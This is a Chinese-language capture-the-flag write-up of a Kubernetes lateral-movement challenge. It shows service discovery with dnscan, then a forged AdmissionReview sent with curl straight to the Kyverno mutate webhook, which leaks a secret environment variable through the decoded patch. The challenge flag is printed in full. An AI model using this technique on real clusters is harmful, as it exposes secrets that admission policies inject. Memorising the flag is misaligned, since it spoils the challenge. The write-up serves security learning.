Lateral Movement
备注
Who will guard the guardians?
Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative services.
当 Pod 被外部机制篡改时,可以利用其繁琐的管理流程,从管理服务中泄露敏感信息。
题目提供了策略
apiVersion: kyverno.io/v1
kind: Policy
metadata:
name: apply-flag-to-env
namespace: sensitive-ns
spec:
rules:
- name: inject-env-vars
match:
resources:
kinds:
- Pod
mutate:
patchStrategicMerge:
spec:
containers:
- name: "*"
env:
- name: FLAG
value: "{flag}"
可以得知,在容器运行后,kyverno 会自动为 sensitive-ns namespace 里的 pod 从环境变量注入 flag
那也就意味着,需要在 sensitive-ns 中创建一个 pod 容器之后,在容器内的环境变量中得到 flag
首先,还是执行一波扫描
player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.0/16
22196 / 65536 [---------------------------------------------------->_______________________________________________________________________________________________________] 33.87% 967 p/s10.100.86.210 kyverno-cleanup-controller.kyverno.svc.cluster.local.
32234 / 65536 [---------------------------------------------------------------------------->_______________________________________________________________________________] 49.19% 965 p/s10.100.126.98 kyverno-svc-metrics.kyverno.svc.cluster.local.
40521 / 65536 [------------------------------------------------------------------------------------------------>___________________________________________________________] 61.83% 965 p/s10.100.158.213 kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
43792 / 65536 [-------------------------------------------------------------------------------------------------------->___________________________________________________] 66.82% 963 p/s10.100.171.174 kyverno-background-controller-metrics.kyverno.svc.cluster.local.
55742 / 65536 [------------------------------------------------------------------------------------------------------------------------------------>_______________________] 85.06% 964 p/s10.100.217.223 kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
59243 / 65536 [--------------------------------------------------------------------------------------------------------------------------------------------->______________] 90.40% 967 p/s10.100.232.19 kyverno-svc.kyverno.svc.cluster.local.
65378 / 65536 [----------------------------------------------------------------------------------------------------------------------------------------------------------->] 99.76% 963 p/s10.100.86.210 -> kyverno-cleanup-controller.kyverno.svc.cluster.local.
10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.
首先,编写一份 pod.yaml
apiVersion: v1
kind: Pod
metadata:
name: curl-flag
namespace: sensitive-ns
spec:
containers:
- name: curl-container
image: curlimages/curl
然后使用 anderseknert/kube-review 将 Kubernetes 资源转换为 Kubernetes AdvisoryReview 请求
┌──(randark㉿kali)-[~/tmp]
└─$ ~/tools/kube-review-linux-amd64 create pod.yaml
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "f2bed072-5fdd-4e5b-a080-168faf73899c",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "curl-flag",
"namespace": "sensitive-ns",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "97530c01-d8ea-4ed1-a7ce-7f07466e7bf8"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "curl-flag",
"namespace": "sensitive-ns",
"creationTimestamp": null
},
"spec": {
"containers": [
{
"name": "curl-container",
"image": "curlimages/curl",
"resources": {}
}
]
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
然后对kyverno-svc-metrics.kyverno.svc.cluster.local发送请求
player@wiz-k8s-lan-party:~$ curl -k -X POST \
> https://kyverno-svc.kyverno.svc.cluster.local:443/mutate \
> -H 'content-type: application/json' \
> -d '{
> "kind": "AdmissionReview",
> "apiVersion": "admission.k8s.io/v1",
> "request": {
> "uid": "4cff4c58-75ba-4c4b-97e8-a972f3fc3ff3",
> "kind": {
> "group": "",
> "version": "v1",
> "kind": "Pod"
> },
> "resource": {
> "group": "",
> "version": "v1",
> "resource": "pods"
> },
> "requestKind": {
> "group": "",
> "version": "v1",
> "kind": "Pod"
> },
> "requestResource": {
> "group": "",
> "version": "v1",
> "resource": "pods"
> },
> "name": "curl-flag",
> "namespace": "sensitive-ns",
> "operation": "CREATE",
> "userInfo": {
> "username": "kube-review",
> "uid": "ca06bc76-7f37-4fcf-af63-5a07fb0c4204"
> },
> "object": {
> "kind": "Pod",
> "apiVersion": "v1",
> "metadata": {
> "name": "curl-flag",
> "namespace": "sensitive-ns",
> "creationTimestamp": null
> },
> "spec": {
> "containers": [
> {
> "name": "curl-container",
> "image": "curlimages/curl",
> "resources": {}
> }
> ]
> },
> "status": {}
> },
> "oldObject": null,
> "dryRun": true,
> "options": {
> "kind": "CreateOptions",
> "apiVersion": "meta.k8s.io/v1"
> }
> }
> }'
{"kind":"AdmissionReview","apiVersion":"admission.k8s.io/v1","request":{"uid":"4cff4c58-75ba-4c4b-97e8-a972f3fc3ff3","kind":{"group":"","version":"v1","kind":"Pod"},"resource":{"group":"","version":"v1","resource":"pods"},"requestKind":{"group":"","version":"v1","kind":"Pod"},"requestResource":{"group":"","version":"v1","resource":"pods"},"name":"curl-flag","namespace":"sensitive-ns","operation":"CREATE","userInfo":{"username":"kube-review","uid":"ca06bc76-7f37-4fcf-af63-5a07fb0c4204"},"object":{"kind":"Pod","apiVersion":"v1","metadata":{"name":"curl-flag","namespace":"sensitive-ns","creationTimestamp":null},"spec":{"containers":[{"name":"curl-container","image":"curlimages/curl","resources":{}}]},"status":{}},"oldObject":null,"dryRun":true,"options":{"kind":"CreateOptions","apiVersion":"meta.k8s.io/v1"}},"response":{"uid":"4cff4c58-75ba-4c4b-97e8-a972f3fc3ff3","allowed":true,"patch":"W3sib3AiOiJhZGQiLCJwYXRoIjoiL3NwZWMvY29udGFpbmVycy8wL2VudiIsInZhbHVlIjpbeyJuYW1lIjoiRkxBRyIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9XX0sIHsicGF0aCI6Ii9tZXRhZGF0YS9hbm5vdGF0aW9ucyIsIm9wIjoiYWRkIiwidmFsdWUiOnsicG9saWNpZXMua3l2ZXJuby5pby9sYXN0LWFwcGxpZWQtcGF0Y2hlcyI6ImluamVjdC1lbnYtdmFycy5hcHBseS1mbGFnLXRvLWVudi5reXZlcm5vLmlvOiBhZGRlZCAvc3BlYy9jb250YWluZXJzLzAvZW52XG4ifX1d","patchType":"JSONPatch"}}
将得到的输出解析
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "4cff4c58-75ba-4c4b-97e8-a972f3fc3ff3",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "curl-flag",
"namespace": "sensitive-ns",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "ca06bc76-7f37-4fcf-af63-5a07fb0c4204"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "curl-flag",
"namespace": "sensitive-ns",
"creationTimestamp": null
},
"spec": {
"containers": [
{
"name": "curl-container",
"image": "curlimages/curl",
"resources": {}
}
]
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
},
"response": {
"uid": "4cff4c58-75ba-4c4b-97e8-a972f3fc3ff3",
"allowed": true,
"patch": "W3sib3AiOiJhZGQiLCJwYXRoIjoiL3NwZWMvY29udGFpbmVycy8wL2VudiIsInZhbHVlIjpbeyJuYW1lIjoiRkxBRyIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9XX0sIHsicGF0aCI6Ii9tZXRhZGF0YS9hbm5vdGF0aW9ucyIsIm9wIjoiYWRkIiwidmFsdWUiOnsicG9saWNpZXMua3l2ZXJuby5pby9sYXN0LWFwcGxpZWQtcGF0Y2hlcyI6ImluamVjdC1lbnYtdmFycy5hcHBseS1mbGFnLXRvLWVudi5reXZlcm5vLmlvOiBhZGRlZCAvc3BlYy9jb250YWluZXJzLzAvZW52XG4ifX1d",
"patchType": "JSONPatch"
}
}
对其中的patch字段进行解码,即可得到
[
{
"op": "add",
"path": "/spec/containers/0/env",
"value": [
{
"name": "FLAG",
"value": "wiz_k8s_lan_party{you-are-k8s-net-master-with-great-power-to-mutate-your-way-to-victory}"
}
]
},
{
"path": "/metadata/annotations",
"op": "add",
"value": {
"policies.kyverno.io/last-applied-patches": "inject-env-vars.apply-flag-to-env.kyverno.io: added /spec/containers/0/env\n"
}
}
]
即可得到答案
wiz_k8s_lan_party{you-are-k8s-net-master-with-great-power-to-mutate-your-way-to-victory}